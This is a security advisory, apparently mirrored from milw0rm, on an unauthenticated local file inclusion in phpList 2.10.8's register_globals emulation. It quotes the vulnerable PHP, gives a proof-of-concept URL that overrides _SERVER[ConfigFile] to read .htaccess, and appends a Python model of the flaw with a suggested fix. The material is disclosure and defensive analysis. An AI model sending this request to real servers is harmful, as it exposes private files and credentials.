
########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: phpList Local File Inclusion
#
# Vendor: http://www.phplist.com
#
# Bug: Local File Inclusion
#
# Vulnerable Version: 2.10.8 (prior versions also may be affected)
#
# Exploitation: Remote with browser
#
# Fix: N/A
#
# Original Advisory: http://www.bugreport.ir/index_60.htm
#
###################################################################



####################
- Description:
####################

Quote from vendor: "phplist is an open-source newsletter manager. phplist is free to download, install and use, and is easy to integrate with any website.

phplist is downloaded more than 10 000 times per month and is listed in the top open source projects for vitality score on Freshmeat.

phplist is sponsored by tincan."



####################
- Vulnerability:
####################

+--> Local File Inclusion

Because of a flaw in "admin/index.php", when "register_globals" is disabled (the default PHP configuration) a remote attacker can include arbitrary files from the local filesystem before any authentication takes place. The script emulates register_globals by copying every entry of $_REQUEST into a global variable of the same name, so a request parameter named "_SERVER[ConfigFile]" replaces the $_SERVER array with attacker-supplied content; the path it carries is then handed to include() as the configuration file. Because the path has to pass is_file(), only files that exist on the server can be targeted, but include() echoes the non-PHP content of such a file verbatim (and executes any PHP it contains), so the result is at least unauthenticated disclosure of local files.

Code Snippet:

/lists/admin.php #line:10-18

if (!ini_get("register_globals") || ini_get("register_globals") == "off") {
    # fix register globals, for now, should be phased out gradually
    # sure, this gets around the entire reason that register globals
    # should be off, but going through three years of code takes a long time....

    foreach ($_REQUEST as $key => $val) {
        $$key = $val;    # every request parameter, "_SERVER" included, becomes a global
    }
}

/lists/admin.php #line:41-56

if (isset($_SERVER["ConfigFile"]) && is_file($_SERVER["ConfigFile"])) {
    print '<!-- using '.$_SERVER["ConfigFile"].'-->'."\n";
    include $_SERVER["ConfigFile"];    # $_SERVER may have been replaced by the loop above
} elseif (isset($cline["c"]) && is_file($cline["c"])) {
    print '<!-- using '.$cline["c"].' -->'."\n";
    include $cline["c"];
} elseif (isset($_ENV["CONFIG"]) && is_file($_ENV["CONFIG"])) {
    # print '<!-- using '.$_ENV["CONFIG"].'-->'."\n";
    include $_ENV["CONFIG"];
} elseif (is_file("../config/config.php")) {
    print '<!-- using ../config/config.php -->'."\n";
    include "../config/config.php";
} else {
    print "Error, cannot find config file\n";
    exit;
}

####################
- POC:
####################

http://www.example.com/lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess

The response starts with the HTML comment "<!-- using ../.htaccess-->" (printed just before the include) followed by the contents of the included file; the comment alone confirms which branch of the include chain was taken, without any admin credentials.

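The control flow behind that PoC, as an added example that is not phpList code and not part of the original advisory: a Python model of the two snippets above, so the path from the query string to include() can be traced offline. It re-implements PHP's bracket syntax in query keys (?_SERVER[ConfigFile]=x becomes $_REQUEST['_SERVER']['ConfigFile']), the register_globals emulation loop, and the config-file include chain, and adds a `hardened` mode that refuses to assign superglobal names (an assumed fix written here, not the vendor's patch). The filesystem and the response body are constructed sample data; `expected_marker` is built from the print statement in the _SERVER branch.

```python
"""
Added example (not phpList code): a Python model of the vulnerable control flow
quoted in the advisory, so the request-to-include() path can be traced offline.
The 'hardened' flag is an assumed fix written here, not the vendor's patch.
"""
from urllib.parse import parse_qsl

# PHP superglobals; the emulation loop must never let a request assign these.
SUPERGLOBALS = {"GLOBALS", "_SERVER", "_GET", "_POST", "_FILES",
                "_COOKIE", "_SESSION", "_REQUEST", "_ENV"}


def php_parse_query(qs):
    """Parse a query string the way PHP fills $_REQUEST: 'a[b]=c' -> {'a': {'b': 'c'}}.
    One nesting level is enough for the patterns on this page."""
    request = {}
    for key, value in parse_qsl(qs, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            base, _, sub = key[:-1].partition("[")
            request.setdefault(base, {})[sub] = value
        else:
            request[key] = value
    return request


def register_globals_emulation(request, scope, hardened=False):
    """The 'foreach ($_REQUEST as $key => $val) $$key = $val;' loop (lines 10-18).
    Every request parameter becomes a global variable, replacing any existing value.
    hardened=True skips superglobal names and anything that is not a valid identifier."""
    for key, value in request.items():
        if hardened and (key in SUPERGLOBALS or not key.isidentifier()):
            continue
        scope[key] = value
    return scope


def choose_config(scope, is_file):
    """The include chain (lines 41-56): the first candidate that passes is_file() wins.
    Returns (branch, path); the branch names mirror the PHP conditions."""
    server = scope.get("_SERVER", {})
    cline = scope.get("cline", {})
    env = scope.get("_ENV", {})
    candidates = [
        ("_SERVER[ConfigFile]", server.get("ConfigFile")),
        ("cline[c]", cline.get("c")),
        ("_ENV[CONFIG]", env.get("CONFIG")),
        ("default", "../config/config.php"),
    ]
    for branch, path in candidates:
        if path is not None and is_file(path):
            return branch, path
    return None


def expected_marker(path):
    """What the _SERVER branch prints right before include(): '<!-- using <path>-->'."""
    return "<!-- using " + path + "-->"


def inclusion_confirmed(body, path):
    """Check a captured response body for the marker, to confirm the PoC from a browser."""
    return expected_marker(path) in body


def simulate(query, existing_files, hardened=False):
    """Run one request through the model; existing_files stands in for the filesystem."""
    scope = {"_SERVER": {"REQUEST_METHOD": "GET"}, "_ENV": {}}  # what PHP set up
    register_globals_emulation(php_parse_query(query), scope, hardened)
    return choose_config(scope, lambda p: p in existing_files)


if __name__ == "__main__":
    # Constructed filesystem: the web root's .htaccess and the real config both exist.
    files = {"../.htaccess", "../config/config.php"}
    print(simulate("", files))                                  # no parameters
    print(simulate("_SERVER[ConfigFile]=../.htaccess", files))  # the advisory's PoC
    print(simulate("_SERVER[ConfigFile]=../.htaccess", files, hardened=True))
    # Constructed response body for the PoC request.
    body = "<!-- using ../.htaccess-->\nAuthType Basic\n"
    print(inclusion_confirmed(body, "../.htaccess"))
```

Two things the model makes visible. First, $$key = $val replaces the whole $_SERVER array, so everything PHP put there is gone and only the attacker's ConfigFile entry remains; that is enough, because isset() and is_file() are the only checks. Second, in this model the hardened loop still lets a request set an ordinary variable such as $cline, so `?cline[c]=../.htaccess` reaches the second branch; whether that holds in the real script depends on whether $cline is assigned between line 18 and line 41, which the quoted lines do not show. The robust fix is to delete the emulation loop and read $_GET/$_POST explicitly, rather than to deny-list variable names.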

####################
- Credit:
####################

AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

# milw0rm.com [2009-01-14]